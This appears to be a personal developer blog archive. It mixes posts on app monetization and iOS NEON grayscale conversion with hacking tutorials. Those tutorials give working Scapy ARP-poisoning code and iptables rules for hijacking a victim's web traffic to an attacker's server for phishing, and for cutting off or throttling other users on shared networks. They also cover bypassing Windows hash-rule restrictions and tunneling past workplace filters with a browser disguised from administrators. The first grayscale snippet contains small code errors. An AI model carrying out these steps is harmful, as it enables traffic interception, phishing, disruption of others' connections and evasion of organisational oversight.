    As you can see from the chart above, for one day's worth of ad traffic, almost fourteen thousand requests for ads were generated from the app, of which only about 53% were actually filled. This produced a grand total of $1.49 in ad revenue for that day. Granted, some days are better than others, but this is about the general trend for ad revenue for this app.

    The bottom line is that making money off of ad revenue should be approached from the standpoint that it is a supplement to your overall profits, and NOT the main contributor. The margins are just too small for most people to be able turn a profit with them alone.

  • Freemium + Paid App Sales
    A freemium app is a fully featured paid app that you release for free with certain features disabled, and ads placed throughout the user interface. The idea behind it being that lots of people will download it because it's free, and then they can opt to remove the ads and/or enable the advanced features of the app by making one or more in-app purchases.

    This is a strategy which really shines when you release a fully featured paid version of an app, and a freemium version of it as well. Some examples of this include my own apps iManga Reader Pro and iManga Reader Lite, as well as other apps like Words With Friends and Words With Friends Free, or Angry Birds and Angry Birds Free.

    A huge benefit to employing a paid and freemium app monetization strategy, is that it effectively doubles your app store presence (and potentially your overall revenue) instantly. Moreover, word of mouth marketing for your app will also flourish due to the fact that people can (and will) download your freemium app for well... free. It's important to understand though, that the majority of your actual sales will come from people buying the paid version of your app, while the freemium version will serve more as a way of drawing in potential customers.

    For example, the iManga Reader Lite usually sees between 125 to 200 downloads a day, and between 3 and 7 in-app purchase "upgrades" to the full version. Where as the iManga Reader Pro sees between 10 and 20 downloads a day.

  • Supplemental In-App Purchases
    Another great way to pad out your monthly app revenue, is through ancillary in-app purchases. These would be things that users could purchase to enhance their app experience, such as power ups, new characters, additional content, etc. The ideal supplemental in-app purchase item is something that is consumable, i.e. something that users can buy, use up, and then (hopefully) buy again.

[ And That's a Wrap ]

Well I hope this article was helpful to you. If you have anymore questions, or would like to talk to me about developing an app, feel free to contact me at brandon.smith@studiobebop.net

Happy coding!

iOS - How to convert BGRA video streams to Grayscale SUPER fast.

February 26, 2012 at 12:00 PM

==========

For a practical example of this algorithm, you can check out my app See It - Video Magnifier.

==========

I thought I would share a little tidbit of iOS development trickery that I finally got worked out today.

I'm working on an app at the moment that takes in a live video feed from a device's back-facing camera, and does some filtering to each frame before displaying it on the device's screen for the user. One of the filtering options my app does, is converting the video feed from color, to grayscale.

Before I go any farther, I'm going to assume that you are familiar with AVCaptureSession, and setting up everything to access a device camera, and display a live preview feed. If not, take a look at Apple's RosyWriter example, and the AVCamDemo example from the WWDC 2010 example code.

The method I was using at first to accomplish this, was to iterate through each pixel in a frame, calculate that pixel's weighted average of Red, Green, and Blue values, and then apply that weighted average to the red, green, and blue channels of the pixel.

Like so,

- (void)processPixelBuffer: (CVImageBufferRef)pixelBuffer
              int BYTES_PER_PIXEL = 4;
          
              int bufferWidth = CVPixelBufferGetWidth(pixelBuffer);
              int bufferHeight = CVPixelBufferGetHeight(pixelBuffer);
              unsigned char *pixels = (unsigned char *)CVPixelBufferGetBaseAddress(pixelBuffer);
          
              for (int i = 0; i < (bufferWidth * bufferHeight); i++) {
                  // Calculate the combined grayscale weight of the RGB channels
                  int weight = (pixel[0] * 0.11) + (pixel[1] * 0.59) + (pixel[2] * 0.3);
          
                  // Apply the grayscale weight to each of the colorchannels
                  pixels[0] = weight; // Blue
                  pixels[1] = weight; // Green
                  pixels[2] = weight; // Red
                  pixels += BYTES_PER_PIXEL;
              }
          }
          

This above snippet of code will take a BGRA format CVImageBufferRef, and convert it to grayscale. Unfortunately for us, it's not very fast. Using the AVCaptureSessionPresetMedium video input setting, I was getting ~7fps on my 4th generation iPod Touch. (Which isn't necessarily bad, but could be better.)

So whilst Googling about for a method to increase my BGRA to Grayscale conversion algorithm's speed, I came across two articles discussing RGB to Grayscale conversion using ARM NEON intrinsic functions. Specifically,

ARM NEON intrinsic functions is not only a mouthful to say, but is also some sort of serious low-level coding black magic available to devices with ARM Cortex A8 (and later) CPUs, that allows you to be able to perform multiple computations at once. I couldn't explain the theory of it all to you to save my life, so I won't even bother tyring. Suffice it to say that using intrinsic functions will allow us to be able to process eight pixels at a time, as opposed to just one.

Those interested in learning more about the nitty gritty of ARM NEON, should take a look at "Introduction to NEON on iPhone" over on Wandering Coder.

So this article explains how to perform a BGRA to Grayscale conversion on an AVCaptureSession video feed, but it doesn't do it very well. So allow me to help fill in the gaps.

First, prepare your project to use NEON intrinsics by adding '-mfpu=neon ' to your project's "Other C flags", and setting your project's compiler to "LLVM GCC 4.2" (Which you should be using already, since all the cool kids use Automatic Reference Counting these days.)

Next, make sure you add this line to your video processing class' header file, otherwise you're going to get all sorts of frustrating compile errors.

#import "arm_neon.h"
          

Finally, implement the intrinsic BGRA to grayscale method outlined in this article. (Show below.)

void neon_convert (uint8_t * __restrict dest, uint8_t * __restrict src, int numPixels)
          {
              int i;
              uint8x8_t rfac = vdup_n_u8 (77);
              uint8x8_t gfac = vdup_n_u8 (151);
              uint8x8_t bfac = vdup_n_u8 (28);
              int n = numPixels / 8;
          
              // Convert per eight pixels
              for (i=0; i < n; ++i)
              {
                  uint16x8_t  temp;
                  uint8x8x4_t rgb  = vld4_u8 (src);
                  uint8x8_t result;
          
                  temp = vmull_u8 (rgb.val[0],      bfac);
                  temp = vmlal_u8 (temp,rgb.val[1], gfac);
                  temp = vmlal_u8 (temp,rgb.val[2], rfac);
          
                  result = vshrn_n_u16 (temp, 8);
                  vst1_u8 (dest, result);
                  src  += 8*4;
                  dest += 8;
              }
          }
          

This last step however, is the trickiest of all! Because unfortunately that article doesn't really tell you how to use this function, and it also leaves out one very important tidbit of information you're going to need. That being, the result that the BGRA to grayscale method actually creates.

You see, you pass the method a CVPixelBuffer of image data (An array of pixels wherein each pixel has four values representing levels of Blue, Green, Red, and Alpha), along with an empty memory buffer. What the method then does, is fill that buffer with the grayscale value for each pixel in the CVPixelBuffer, which by itself is totally useless.

So in order to actually make your video feed appear grayscale, you have to not only run each preview frame through your intrinsic method, but then apply the created grayscale values to each pixel in your preview frame.

So enough talk, here's all the code you're going to need to make it all happen!

void neon_convert (uint8_t * __restrict dest, uint8_t * __restrict src, int numPixels)
          {
              int i;
              uint8x8_t rfac = vdup_n_u8 (77);
              uint8x8_t gfac = vdup_n_u8 (151);
              uint8x8_t bfac = vdup_n_u8 (28);
              int n = numPixels / 8;
          
              // Convert per eight pixels
              for (i=0; i < n; ++i)
              {
                  uint16x8_t  temp;
                  uint8x8x4_t rgb  = vld4_u8 (src);
                  uint8x8_t result;
          
                  temp = vmull_u8 (rgb.val[0],      bfac);
                  temp = vmlal_u8 (temp,rgb.val[1], gfac);
                  temp = vmlal_u8 (temp,rgb.val[2], rfac);
          
                  result = vshrn_n_u16 (temp, 8);
                  vst1_u8 (dest, result);
                  src  += 8*4;
                  dest += 8;
              }
          }
          
          // Method that processes a CVPixelBuffer representation of a preview frame
          - (void)processPixelBuffer: (CVImageBufferRef)pixelBuffer
          {
              // lock the pixel buffer into place in memory
              CVPixelBufferLockBaseAddress( pixelBuffer, 0 );
          
              // Get the dimensions of the preview frame
              int bufferWidth = CVPixelBufferGetWidth(pixelBuffer);
              int bufferHeight = CVPixelBufferGetHeight(pixelBuffer);
          
              // Turn the CVPixelBuffer into something the intrinsic function can process
              uint8_t *pixel = CVPixelBufferGetBaseAddress(pixelBuffer);
          
              // Allocate some memory for the grayscale values that the intrinsic function will create
              uint8_t * baseAddressGray = (uint8_t *) malloc(bufferWidth*bufferHeight);
          
              // Convert BGRA values to grayscale values
              neon_convert(baseAddressGray, pixel, bufferWidth*bufferHeight);
          
              // Iterate through each pixel in the preview frame, and apply the weighted value of that pixel's RGB color channels
              for (int i = 0; i < (bufferWidth * bufferHeight); i++) {
                  pixel[0] = baseAddressGray[i];
                  pixel[1] = baseAddressGray[i];
                  pixel[2] = baseAddressGray[i];
                  pixel += BYTES_PER_PIXEL;
              }
          
              // Release the grayscale values buffer
              free(baseAddressGray);
          
              // Unlock the pixel buffer, we're done processing it
              CVPixelBufferUnlockBaseAddress( pixelBuffer, 0 );
          }
          

And that's it! Using this method, I'm able to get ~25fps on the same preview frame that I was getting ~7fps using my original method.

[ Kick it up a notch, with inline assembly! ]

While the performance boost you get from using intrinsic functions is pretty great, you can get even more performance out of your app by using an inline ASM BGRA to Grayscale conversion method! Which is exactly what this article talks about doing, but again, the author doesn't explain how to do it (and there's a bug in his code that makes it unusable).

Luckily for you, myself (and a kind anon), have worked out the kinks, and everything works super smooth now.

All you need to do, is add this method to your existing code,

static void neon_asm_convert(uint8_t * __restrict dest, uint8_t * __restrict src, int numPixels)
          {
              __asm__ volatile("lsr %2, %2, #3 \n"
                           "# build the three constants: \n"
                           "mov r4, #28 \n" // Blue channel multiplier
                           "mov r5, #151 \n" // Green channel multiplier
                           "mov r6, #77 \n" // Red channel multiplier
                           "vdup.8 d4, r4 \n"
                           "vdup.8 d5, r5 \n"
                           "vdup.8 d6, r6 \n"
                           "0: \n"
                           "# load 8 pixels: \n"
                           "vld4.8 {d0-d3}, [%1]! \n"
                           "# do the weight average: \n"
                           "vmull.u8 q7, d0, d4 \n"
                           "vmlal.u8 q7, d1, d5 \n"
                           "vmlal.u8 q7, d2, d6 \n"
                           "# shift and store: \n"
                           "vshrn.u16 d7, q7, #8 \n" // Divide q3 by 256 and store in the d7
                           "vst1.8 {d7}, [%0]! \n"
                           "subs %2, %2, #1 \n" // Decrement iteration count
                           "bne 0b \n" // Repeat unil iteration count is not zero
                           :
                           : "r"(dest), "r"(src), "r"(numPixels)
                           : "r4", "r5", "r6"
                           );
          }
          

And replace

neon_convert(baseAddressGray, pixel, bufferWidth*bufferHeight);
          

with

neon_asm_convert(baseAddressGray, pixel, bufferWidth*bufferHeight);
          

and you're done!

[ Here's some benchmarks ]

==========

For a practical example of this algorithm, you can check out my app See It - Video Magnifier.

==========

Hijacking Web Traffic

October 9, 2011 at 12:00 PM

In this article, I will explain how to intercept and control the web (HTTP/S) traffic of single or multiple hosts within a local area network. The attack itself is rather simple. First, an attacker poisons the ARP cache of a victim's workstation - effectively making the attacker a middle man between the victim and the router. Next, the victim generates some sort of web traffic which is intercepted by the attacker and redirected to a HTTP server controlled by the attacker. Thus opening up the possibility for anything from a simple MITM phishing scheme, to a network wide Rick Roll.


[ Prerequisites ]

Before we begin, you'll need the following:

Note: If you don't have a Linux workstation handy, then the Backtrack live CD is your best friend.
http://www.backtrack-linux.org/


[ Step 1: Configure HTTP Server ]

There are only two things you need to configure on your HTTP server. First set your index page to whatever you want your victim to see. Next, and this is crucial, you need to set your index page as the page displayed for 404 errors. On Apache you do this by opening the httpd.conf file and searching for "ErrorDocument 404", this should bring you to a line that looks like:

#ErrorDocument 404 /missing.html 
          

You want to change this line to:

ErrorDocument 404 /news.py 
          

The reason this is needed, is incase a victim requests something like, "http://myspace.com/index.cfm?fuseaction=user", they'll still be redirected to your intended page, instead of the standard Error 404 page.


[ Step 2: Configuring IP Tables ]

The next step is to configure IP Tables to listen for incoming traffic on a network interface and to either forward that traffic to the router, or to your HTTP server. This is done with following commands:

# These first four commands enable traffic forwarding, and tell IP Tables to listen for traffic
          # on interface eth0 and to forward it out interface eth0.
          echo 1 > /proc/sys/net/ipv4/ip_forward
          echo 0 > /proc/sys/net/ipv4/conf/eth0/send_redirects
          iptables --append FORWARD --in-interface eth0 --jump ACCEPT
          iptables --table nat --append POSTROUTING --out-interface eth0 --jump MASQUERADE
          
          # These next two commands tell IP Tables to change the destination address for any traffic
          # received on TCP port 80 or 443 to the IP Address of your HTTP server.
          iptables -t nat -A PREROUTING -p tcp --dport 80 --jump DNAT --to-destination HTTP_Server_IP
          iptables -t nat -A PREROUTING -p tcp --dport 443 --jump DNAT --to-destination HTTP_Server_IP 
          


[ Step 3: Poison The ARP Cache ]

Now that you've configured your system, it's finally time to carry out the attack! How you carry out this step is really up to you. All you need to do is poison the target's ARP cache so that the IP address of the router points to your workstation. There are many tools out there that can be used to accomplish this task, however in this tutorial I will be using Python and the Scapy module. Open up your Python interpreter and enter the following commands.

>>> import scapy, time # imports the scapy and time modules
          >>> a = scapy.ARP() # creates an ARP packet object
          >>> a.psrc = "192.168.1.1" # sets the 'from' IP address to the router's
          >>> a.pdst = "192.168.1.12" # the leech's IP address
          >>> while 1:
          ...        scapy.send(a) # sends the packet
          ...        time.sleep(90) # tells python to sleep for 90 seconds, and then send the packet again 
          


[ Finale ]

Finally, you have finished your attack. You now have full control of your target's web traffic. Feel free to laugh maniacally at whatever dark horrors you've just exposed your victim to.

Squashing Bandwidth Leeches

October 9, 2011 at 12:00 PM

At times you may find yourself on a public network, only to be subjugated to slower speeds because another user is taking up all the bandwidth downloading pr0n, music, games, etc. With no administrative rights to the network and your computer as your only weapon, what's a h4x0r to do? Fear not my friend, you have all you need and James is here to help you take back the net! To be more specific, I will be discussing how to cut off a leech's Internet access, how to block specific ports from a leech, and how to regulate the amount of bandwidth a leech can use. So put your boots on, it's time to squash some leeches!


--[ Prerequisites ]---

  • A Linux system running kernel 2.4.20 or higher, with iptables.
  • Python, and the Scapy module.
  • A slight understanding of what iptables.
  • If you don't have access to a computer that uses Linux, then you can just use the Backtrack live CD.
  • You will also need to know the IP address of both the leech, and the router for the network.
  • The following IP addresses will be used in this paper.
    Router IP: 192.168.1.1
    Your IP: 192.168.1.2 over interface eth0
    Leech IP: 192.168.1.11


---[ Phase 1: ARP Spoofing ]---

Address Resolution Protocol (ARP) is a TCP/IP protocol used to map an IP address to a physical (MAC) address. In order to communicate with a device on a network, a host needs to know that device's MAC and IP address. In order to learn a devices MAC address, a host will send out a broadcast that in essence says, "Hey my IP address is 192.168.1.2 and my MAC address is AA:BB:CC:DD:EE:FF, what's the MAC address of 192.168.1.1?" Host 192.168.1.1 will make an entry in its ARP table that says, "192.168.1.2 is at AA:BB:CC:DD:EE:FF." It will then send a message to 192.168.1.2 that says, "I'm 192.168.1.1 and my MAC address is 00:11:22:33:44:55:66." Host 192.168.1.2 will then make an entry in its ARP table that says, "192.168.1.1 is at 00:11:22:33:44:55:66." The problem is, that when a host receives a 'who-has' ARP message, it will ALWAYS update it's ARP table with the IP and MAC address of whomever sent the broadcast. So sending a specially crafted 'who-has' message, makes it possible to map any IP address in a host's ARP table to any MAC address you want. How does all of this help stop bandwidth leeching? Well in order to communicate with the outside world, a host will send traffic destined for outside the network to the router. The router then takes that traffic and sends it along to its destination. Now if someone were to set the MAC address of the router on the leech machine to something bogus, then traffic destined for the outside world would never reach the router! So launch your python interpreter and let's try shall we? Use following excerpt from my python interpreter as a guide.

>>> import scapy, time
          >>> a = scapy.ARP() # creates an ARP message object
          >>> a.psrc = "192.168.1.1" # sets the 'from' IP address to the router's
          >>> a.pdst = "192.168.1.12" # the leech's IP address
          >>> a.hwsrc = "aa:bb:cc:dd:ee:ff" # sets the 'from' MAC address to a bogus one
          >>> while 1:
          ... scapy.send(a)
          ... time.sleep(90) # sleep for 90 seconds and then send again
          ...
          .
          Sent 1 packets.
          


---[ Phase 2: Owning with MITM ]---

Now spoofing the router entry within a leech's ARP table to something bogus may be effective, it's not very fun. So instead of having packets destined for the router sent to nowhere, have them sent to you! Why would you want to do that? Well because now you control their Internet connection, which allows you to control what they access and how much bandwidth they can use. So first thing's first, poison the leech's ARP table to point to you. Use following excerpt from my python interpreter as a guide.

>>> import scapy, time
          >>> a = scapy.ARP() # creates an ARP message object
          >>> a.psrc = "192.168.1.1" # sets the 'from' IP address to the router's
          >>> # by not setting the hwsrc, the 'from' MAC address is set to our own
          >>> a.pdst = "192.168.1.12" # the leech's IP address
          >>> while 1:
          ... scapy.send(a)
          ... time.sleep(90)
          

Just poisoning the leech's ARP table isn't enough this time though. You will need to setup some iptables rules to enable traffic forwarding. This is accomplished by entering the following commands as root.

echo 1 > /proc/sys/net/ipv4/ip_forward
          echo 0 > /proc/sys/net/ipv4/conf/eth0/send_redirects
          iptables --append FORWARD --in-interface eth0 --jump ACCEPT
          

The first two commands tell the kernel to enable packet forwarding, and not to send ICMP redirects. While the last command makes an iptables rule that allows packets that come in from eth0 to be forwarded to their destination. So now that traffic from the leech is being routed through your computer, let's block some ports!

iptables --insert FORWARD --protocol tcp --destination-port 80 --jump DROP 
          

The command above tells iptables to drop all packets to be forwarded that have a destination port of 80 (HTTP). In other words, the leech is now blocked from using HTTP. The reason '--insert' is used instead of '--append', is because rules in an iptables chain are executed in order. So rules that drop packets, should come before rules that accept packets. I could go on and on about filtering network traffic, but there are plenty of papers about that subject already out there. So instead I'll give you a link to the iptables man page. http://linuxreviews.org/man/iptables


---[ Phase 3: Bandwidth Limiting ]---

Bandwidth limiting allows you to control how much bandwidth a leech can use. In other words you could throttle a leech's connection speed down to that of a 56k modem, oh the irony. This is accomplished through the creation of a special queuing disciple aka. qdisc. First though, a brief summary of what a qdisc is, brought to you by "The Traffic Control HOWTO" http://tldp.org/HOWTO/Traffic-Control-HOWTO

Simply put, a qdisc is a scheduler. Every output interface needs a scheduler of some kind, and the default scheduler is a FIFO (First In First Out). Other qdiscs available under Linux will rearrange the packets entering the scheduler's queue in accordance with that scheduler's rules.

There are several different qdiscs out there, each with their own way of handling traffic. However the qdisc we will be using is the Hierarchal Token Bucket qdisc, because HTB makes it easy to regulate bandwidth. To setup HTB, enter the following commands as root.

tc qdisc add dev eth0 parent root handle 1: htb default 10
          tc class add dev eth0 parent 1: classid 1:10 htb rate 100mbit prio 0
          tc class add dev eth0 parent 1: classid 1:11 htb rate 56kbit prio 1
          tc filter add dev eth0 protocol ip parent 1:0 handle 1337 fw flowid 1:11
          

The first command creates a new HTB qdisc for eth0, and tells it to default traffic to class 1:10. The second command creates the 'default' bandwidth class (identified as 1:10) with a maximum transmission speed of 100 megabits per second. The third command creates the 'leech' bandwidth class (identified as 1:11) with a maximum transmission speed of 56 kilobits per second. The last command tells the qdisc that any packets marked as 1337 (discussed below) should be placed into the 'leech' class. Finally, there are three iptables rules that must be applied in order to make all of this work.

iptables --table nat --append POSTROUTING --out-interface eth0 --jump MASQUERADE
          iptables --table mangle --append FORWARD --in-interface eth0 --source 192.168.1.11 --jump MARK --set-mark 1337
          iptables --table mangle --append FORWARD --in-interface eth0 --destination 192.168.1.11 --jump MARK --set-mark 1337
          

In order to control both upload and download speed of the leech, NAT (Called masquerading in Linux) is required. This is accomplished with the first command. The next two commands tell iptables to mark any packets from or to the leech's IP address as 1337. Those packets are then handled by the tc filter rule setup above. Game over, boom head shot, the end, no more leeching problem.


---[ Bonus! ]---

Below are two scripts to help make your leech squashing easier. The first is to poison the leech's ARP table, and the second handles setting up iptables, and HTB. Put both in the same directory, and run 'squashLeech.sh'.

Download: poisARP.py
Download: squashLeech.sh

Sidestepping Windows Software Restriction Policies

October 9, 2011 at 12:00 PM

Computer administrators use software restriction policies to prevent users from installing and/or running unwanted programs, such as video games, on company computers. Windows has quite a few methods for restricting programs, a full list of which can be found here: http://technet2.microsoft.com/windowsse...21033.mspx In this article, I will be discussing specifically how to bypass hash rules.

Hash rules work by adding either a MD5 or SHA-1 hash for an application an administrator wants to restrict to a blacklist. Whenever a user tries to run a program, its hash is checked against the list of blacklisted programs; if it matches, the program will be prevented from executing. Hash rules are useful because they will remain effective regardless if a user moves or renames the file. The problem is that they only apply to files that share the same hash as the file used to generate the original hash. So in order to sidestep a hash rule, one need only modify the restricted executable so that its hash no longer matches the one for the rule.

Alright, on to business. First, create a text file in the directory of the restricted file. Next open up a command prompt, and cd into the directory of the restricted file. Then run the following command,

copy /B restricted_exe.exe + text_file.txt new_exe.exe 
          

The result will be a slightly larger executable with a different hash from the original. That's it you're done, it's that easy.

Network Ninjitsu: The Art of Bypassing Firewalls and Web Filters

October 6, 2011 at 12:00 PM

(Originally published in the Spring 2007 issue of 2600: The Hacker Quarterly)

[ Introduction ]

Picture yourself in the following situation. You're at school/work minding your own business simply perusing the Internet and all it has to offer. However when you try to visit your ninja clan's website, you are instead presented with a web page stating that this particular website is blocked. Naturally you are shocked and offended by such an action. So do something about it; sneak through like a ninja with a SSH tunnel.


[ A Brief Explanation ]

For those who have no idea what an SSH tunnel is, imagine that whenever you establish a connection to a SSH server that you are digging an underground tunnel from your location at Point A to the server's location at Point B in which a messenger carries messages back and forth between you and the server. The reason that the tunnel is underground, is because your connection is encrypted, because of this people cannot see what is being sent back and forth through your connection (underground tunnel). Now once you have established a connection, you have an entire tunnel to send data back and forth through.

Now the great thing about this underground tunnel is that it is big enough so that it can fit more then 1 messenger. As a result it is possible to send messengers with messages for a server at Point C through the underground tunnel, have them relayed from Point B to point C, from Point C back back to Point B, and then sent through the underground tunnel back to you at Point A.

For a more detailed explanation see the Wikipedia page about Tunneling Protocols: http://en.wikipedia.org/wiki/Tunneling_protocol


[ The Guards ]

Let's assume that the network that you are currently on has a server that filters web traffic, and is guarded by a firewall that does not allow inbound connections, and only allows outbound connections on ports: 21 (FTP), 80 (HTTP), and 443 (HTTPS). How is this information useful you ask? Well we know that we can get traffic out of 3 different ports, which means that you have 3 openings from which you can dig a tunnel.


[ Preparation ]

In order to successfully sneak through the firewall/web filter you will need 2 things:


[ A Simple Tunnel ]

The command for creating a tunnel with plink is, plink -N -P PortNumver -L SourcePort:RemoteServer:ServicePort -l UserName SSHServerAddress (without the quotes). For PortNumber use a port that you are outbound access on. For SourcePort use any number between 1 and 65535, for RemoteServer use the IP Address of a remote server you would like to access, and for ServicePort use the port of the service you'd like to access on the remote server.

For example to tunnel a HTTP Connection to a remote server at 72.14.207.99 through a SSH server listening on port 21 and with the address 123.123.123.123 the command would look like, plink -N -P 21 -L 1337:72.14.207.99:80 -l YourUsername 123.123.123.123 Once you have entered your password, open up a web browser and enter http://127.0.0.1:1337 into the address bar and you will be looking at the Google home page.

NOTE 1: When using the above command syntax, after you have provided your correct password, the blinking cursor will drop a line. This means that your login was successful.

NOTE 2: Tunnels can be used to proxy a connection to any address on any port, however this article will focus on tunneling web pages.


[ Dynamic SOCKS-based Jutsu! ]

While a simple tunnel may be alright for connecting to one specific server, a ninja such as yourself has many different servers to browse and it is impractical to create a tunnel for each different server that you may want to connect to. This is where Dynamic SOCKS-based port forwarding comes into play. Which in n0n-1337-ninj4 terms is a SSH tunnel similuar to the one created in the section above, but its RemoteServer and ServicePort are dynamic, however its SourcePort remains the same.

The command for creating a dynamic tunnel is, plink -N -P PortNumver -D SourcePort -l UserName SSHServerAddress Creating a Dynamic tunnel is a little less confusing (syntax wise) then a simple tunnel, however using it is slightly more complex.


[ Web Browsing Over a Dynamic Tunnel ]

In order to use a web browser over a dynamic tunnel, you need to be able to modify the browser's proxy settings. In your current restricted environment you are unable to modify your school's/work's web browser (Which is Internet Explorer (boo!)) settings. However, this isn't a problem for a ninja like yourself, all you must do is acquire a web browser that you have full control over. However, you can't leave any trace of using another web browser, (for it is not the ninja way) so installing a new one is out of the question. This is where Firefox Portable (a mobile install-free version of Firefox) steps in. Download FP from http://portableapps.com/apps/internet/firefox_portable (This article covers using Firefox Portable 2.0) and extract it to a USB jump drive, or to your hard drive for later burning to a CD.

To use PF over a dynamic tunnel: first start PF click on 'Tools' and choose 'Options', in the options windows click the button at the top labeled 'Advanced', under the 'Connection' section click the button labeled 'Settings...', in the connections settings window choose the third option labeled 'Manual proxy configuration:', in the entry box next to the words 'SOCKS Host' enter 127.0.0.1, in the entry box to the right of the entry box for 'SOCKS Host' enter the SourcePort you used when creating your dynamic tunnel, make sure that SOCKS v5 is selected and click OK.

PF will now send and receive all traffic over your dynamic tunnel; however by default PF does DNS lookups locally, which can give away what you are browsing. (very un-ninja-like) To configure PF to send DNS lookups over a dynamic tunnel: in the address bar type 'about:config' and hit enter, in the entry box next to the word 'Filter' enter 'network.proxy.socksremotedns', right click the result and select the 'Toggle' option.


[ Cloaking PF to look like IE ]

Well now you've got a copy of PF using a dynamic tunnel to browse the web, but PF isn't very stealthy, and any passing teacher/administrator will be all over you when they see it. As a ninja stealth is very important, so your next priority is to configure PF so that it looks like Internet Explorer. You will need the following in order to effectively cloak your copy of PF:

  • Neofox IE 6: https://addons.mozilla.org/firefox/4327/
    A theme that makes PF look like IE 6.0
  • Firesomething: https://addons.mozilla.org/firefox/31/
    An extension that allows you to change the title of the web browser.
    NOTE: you will have to modify the .xpi slightly to make it install with PF 2.0, the steps on how to do this are in the first comment of the page.
  • Internet Explorer XP Icons: http://www.bamm.gabriana.com/cgi-bin/download.pl/package/ieiconsxp.xpi
    An extension that replaces the Firefox icons with the ones used by IE. Configure Firesomething to change the browser title from "Mozilla Firefox" to "Microsoft Internet Explorer". PF should now look at least resemble IE at a passing glance, and with some tool bar and appearance tweaking on your part, no teacher/administrator will spare it a second glance.


[ Final Notes and Closing ]

With your new skills in Network Ninjitsu, no web filter/firewall will stand a chance. For questions and comments you can comment me at jamespenguin[at]gmail.com

In case anyone cares, a RAR archive that contains: the paper, plink, and a modified version of Portable Firefox has been uploaded to the Inforamtion Leak server.

Download (RAR - 10Mb)

Go to Page

Copyright © Brandon Smith
ORIGINAL CONTENT DO NOT STEAL KTHX